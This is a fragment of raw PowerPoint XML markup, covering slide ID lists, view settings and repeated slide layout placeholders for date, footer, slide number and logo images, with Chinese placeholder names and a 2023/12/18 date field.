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1" r:id="rId3"/>
    <p:sldId id="264" r:id="rId4"/>
    <p:sldId id="263" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="266" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="293" r:id="rId13"/>
    <p:sldId id="294" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="271" r:id="rId16"/>
    <p:sldId id="275"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5" r:id="rId36"/>
    <p:sldId id="298" r:id="rId37"/>
    <p:sldId id="296" r:id="rId38"/>
    <p:sldId id="297" r:id="rId39"/>
    <p:sldId id="260"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8"/>
    <p:restoredTop sz="94820"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="109" d="100"/>
          <a:sy n="109" d="100"/>
        </p:scale>
        <p:origin x="192" y="184"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="114" d="100"/>
          <a:sy n="114" d="100"/>
        </p:scale>
        <p:origin x="3632" y="1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FB87A-C829-5141-99B9-AC0252646DF0}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18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7DF61-9B6B-8443-8903-2EEC366E2546}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66355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47DF61-9B6B-8443-8903-2EEC366E2546}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101242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47DF61-9B6B-8443-8903-2EEC366E2546}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2742338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47DF61-9B6B-8443-8903-2EEC366E2546}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143598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47DF61-9B6B-8443-8903-2EEC366E2546}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="470157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47DF61-9B6B-8443-8903-2EEC366E2546}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3894000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a:xfrm>
            <a:off x="1140204" y="5165113"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDAE1562-358E-C843-8747-0833E2CF7E70}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4829554"/>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932802" y="4846332"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D96E78F1-6360-7C4F-8F34-D4C81E64F7DD}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB006984-23F0-CCDD-ACFF-10A053904F17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257525" y="258417"/>
            <a:ext cx="2763089" cy="238540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="卡通人物&#10;&#10;低可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9B6E6F-62A5-39D2-5C0E-B00BCB1E662D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261374" y="6415548"/>
            <a:ext cx="1800210" cy="235973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138634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竖排文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1548788"/>
            <a:ext cx="10515600" cy="43513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1140204" y="5165113"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDAE1562-358E-C843-8747-0833E2CF7E70}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4829554"/>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932802" y="4846332"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D96E78F1-6360-7C4F-8F34-D4C81E64F7DD}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1F8D6C8-E33F-4DEA-7405-9BC56D62B2B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257525" y="258417"/>
            <a:ext cx="2763089" cy="238540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="卡通人物&#10;&#10;低可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C24BCAF-51A0-2F5E-6692-11A273764CA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261374" y="6415548"/>
            <a:ext cx="1800210" cy="235973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101396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1140204" y="5165113"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDAE1562-358E-C843-8747-0833E2CF7E70}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4829554"/>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932802" y="4846332"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D96E78F1-6360-7C4F-8F34-D4C81E64F7DD}"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EE67E4FC-DFB4-7B55-A99D-CADE8FBC3358}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257525" y="258417"/>
            <a:ext cx="2763089" cy="238540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;低可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A23F2078-220C-7898-7ADB-97446931E5EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261374" y="6415548"/>
            <a:ext cx="1800210" cy="235973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121103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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1548788"/>
            <a:ext cx="10515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1140204" y="5165113"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDAE1562-358E-C843-8747-0833E2CF7E70}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4829554"/>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932802" y="4846332"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D96E78F1-6360-7C4F-8F34-D4C81E64F7DD}"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B7781C6C-329A-6DD9-7676-FE97A22C7484}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257525" y="258417"/>
            <a:ext cx="2763089" cy="238540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;低可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74632CEF-7AFC-308D-06FA-15C40B3AB555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261374" y="6415548"/>
            <a:ext cx="1800210" cy="235973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10469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a:xfrm>
            <a:off x="1140204" y="5165113"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDAE1562-358E-C843-8747-0833E2CF7E70}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4829554"/>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932802" y="4846332"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D96E78F1-6360-7C4F-8F34-D4C81E64F7DD}"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E679F781-2E68-765F-A62E-B173ABC39CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257525" y="258417"/>
            <a:ext cx="2763089" cy="238540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;低可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9954488-D559-B077-0819-2D0200309AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261374" y="6415548"/>
            <a:ext cx="1800210" cy="235973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2012727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a:xfrm>
            <a:off x="1140204" y="5165113"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDAE1562-358E-C843-8747-0833E2CF7E70}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4829554"/>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6932802" y="4846332"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D96E78F1-6360-7C4F-8F34-D4C81E64F7DD}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9806DCF1-73A5-8924-1F82-8AFC0582CD62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257525" y="258417"/>
            <a:ext cx="2763089" cy="238540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="卡通人物&#10;&#10;低可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5C8E79E-2B58-CA0D-49B6-1B34969D75BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261374" y="6415548"/>
            <a:ext cx="1800210" cy="235973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="754853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a:xfrm>
            <a:off x="1140204" y="5165113"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDAE1562-358E-C843-8747-0833E2CF7E70}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="页脚占位符 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4829554"/>
            <a:ext cx="4114800" cy="365125"/>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a:xfrm>
            <a:off x="6932802" y="4846332"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D96E78F1-6360-7C4F-8F34-D4C81E64F7DD}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D48DBC5-5E74-CD72-B6D2-D86F9D0040AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257525" y="258417"/>
            <a:ext cx="2763089" cy="238540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9" descr="卡通人物&#10;&#10;低可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4364E8D-B28E-C445-5A9C-0A46934CEBE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261374" y="6415548"/>
            <a:ext cx="1800210" cy="235973"/>
